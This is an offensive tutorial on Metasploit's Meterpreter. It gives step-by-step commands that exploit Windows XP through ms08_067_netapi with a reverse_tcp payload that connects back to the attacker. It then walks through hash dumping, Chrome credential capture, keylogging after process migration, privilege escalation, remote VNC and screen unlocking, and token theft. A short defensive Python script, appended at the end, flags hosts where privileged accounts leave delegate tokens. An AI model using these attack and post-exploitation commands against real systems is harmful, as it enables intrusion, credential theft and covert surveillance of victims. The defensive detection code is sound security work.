Metasploit 4
Meterpreter part 1
What is Meterpreter?
Meterpreter is a payload that uses the DLL injection technique in memory, so
antivirus software can't detect it because Meterpreter writes nothing to disk.
Meterpreter uses encrypted communications.
Now let's try to hack a Windows machine (Windows XP) and set Meterpreter as the payload.
First we will use the ms08_067_netapi exploit
use exploit/windows/smb/ms08_067_netapi
Then we set the remote host (victim)
set RHOST 192.168.0.227
Then we set meterpreter as a payload
set PAYLOAD windows/meterpreter/reverse_tcp
Then we set the IP address of the local machine (attacker) so that Meterpreter can connect back to it
set LHOST 192.168.0.229
Then ...
exploit
Excellent
The exploit (ms08_067_netapi) succeeded and the remote machine (victim) connected back to the local machine (attacker).
Now we have a Meterpreter session open.
Let's explore some basic Meterpreter commands:
1- sysinfo
Collects information about the system
2- screenshot
Captures the current desktop
3- Dumping the password hash
Note: Meterpreter contains many scripts such as (vnc, winenum, chrome_enum, killav ...)
To run a script, type run script_name, for example (run chrome_enum) to capture Chrome credentials
To list all Meterpreter scripts just type run and hit tab twice
4- keystrokes
A keystroke logger is keyboard-capturing software; it records the keys struck on a keyboard.
A- migrate to explorer
First we use the ps command to view all processes on the remote machine to get the PID of the explorer process (explorer PID = 1432)
Then we do the migration
What is migrate?
Migrating moves the Meterpreter session from one process to another to avoid losing the session if the original process is killed
migrate 1432
B- run keylog_recorder
Note : the output file is located in "/root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt"
Now on windows try to type on keyboard
ping 192.168.0.229 then CTRL+C
C- To interrupt the keystroke logger hit CTRL+C
Now let's view the dumped file
cat /root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt
As expected
5-Privilege Escalation
To get SYSTEM as the admin user (full access, full privileges)
A- Load priv extension
use priv
B- To get SYSTEM as admin
C- To verify the admin privileges
getuid
6- VNC
VNC (Virtual Network Computing) is remote desktop control software
To install VNC on the remote machine
run vnc
To unlock the remote screen
run screen_unlock
7- Token impersonation
How to impersonate user tokens to access the system or network without having to provide credentials.
There are two types of tokens
1- delegate: for interactive logons such as remote desktop and logging on at the machine
2- impersonate: for non-interactive logons such as a domain logon
To do so you have to load incognito extension
use incognito
Then list the available tokens
list_tokens -u
To get the token of SYSTEM
impersonate_token "NT AUTHORITY\\SYSTEM"
Now we are running as SYSTEM (full access)
OR
Use the ps command to list all running processes; then you can steal the token of the owner of any process
A- ps
Now if I want to run as Administrator (owner of the process wuauclt.exe, PID = 1528), or of course any other process owned by Administrator
B- steal_token 1528
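The token section above turns on one fact: an interactive logon (console or RDP) leaves a delegate-level token on the host, which anyone who compromises that host can take over. The following is an added example, not from the original page or from Metasploit, showing the defender's view of that exposure: it walks constructed Windows Security 4624 logon events (the field names and the host/account names are constructed for the example) and reports the hosts where a privileged account has left a delegate token behind.

```python
import re
from collections import defaultdict

# Constructed sample Security log lines (not real captures), one event per line.
SAMPLE_EVENTS = [
    "EventID=4624 Computer=WS01 TargetUserName=alice TargetDomainName=CORP LogonType=2",
    "EventID=4624 Computer=WS01 TargetUserName=Administrator TargetDomainName=CORP LogonType=10",
    "EventID=4624 Computer=WS01 TargetUserName=svc_backup TargetDomainName=CORP LogonType=3",
    "EventID=4624 Computer=WS01 TargetUserName=WS01$ TargetDomainName=CORP LogonType=3",
    "EventID=4634 Computer=WS01 TargetUserName=alice TargetDomainName=CORP LogonType=2",
    "EventID=4624 Computer=WS02 TargetUserName=bob TargetDomainName=CORP LogonType=11",
]

# Accounts whose delegate token on a workstation would be a serious find (assumed list).
PRIVILEGED = {"CORP\\Administrator", "CORP\\svc_backup"}

# Logon types that produce a delegate-level token: 2 interactive, 10 RDP, 11 cached interactive.
# Everything else (e.g. 3 network) only yields an impersonate-level token.
DELEGATE_LOGON_TYPES = {2, 10, 11}

FIELD = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Turn a 'key=value key=value' log line into a dict."""
    return dict(FIELD.findall(line))

def token_type(logon_type):
    return "delegate" if int(logon_type) in DELEGATE_LOGON_TYPES else "impersonate"

def delegate_exposure(lines):
    """Map each host to the sorted accounts whose interactive logon left a delegate token."""
    exposure = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4624":          # only successful logons matter here
            continue
        user = ev["TargetUserName"]
        if user.endswith("$") or user.upper() == "SYSTEM":   # skip machine/built-in accounts
            continue
        if token_type(ev["LogonType"]) == "delegate":
            exposure[ev["Computer"]].add(f"{ev['TargetDomainName']}\\{user}")
    return {host: sorted(users) for host, users in exposure.items()}

def privileged_delegate_hosts(lines, privileged=PRIVILEGED):
    """Hosts where compromising the box would hand over a privileged account's delegate token."""
    return {host: [u for u in users if u in privileged]
            for host, users in delegate_exposure(lines).items()
            if any(u in privileged for u in users)}

if __name__ == "__main__":
    for host, users in privileged_delegate_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: privileged delegate tokens present for {', '.join(users)}")
```

In the sample, svc_backup only logged on over the network (type 3), so it is not reported; the RDP logon by Administrator on WS01 is the one a defender would want to eliminate or monitor.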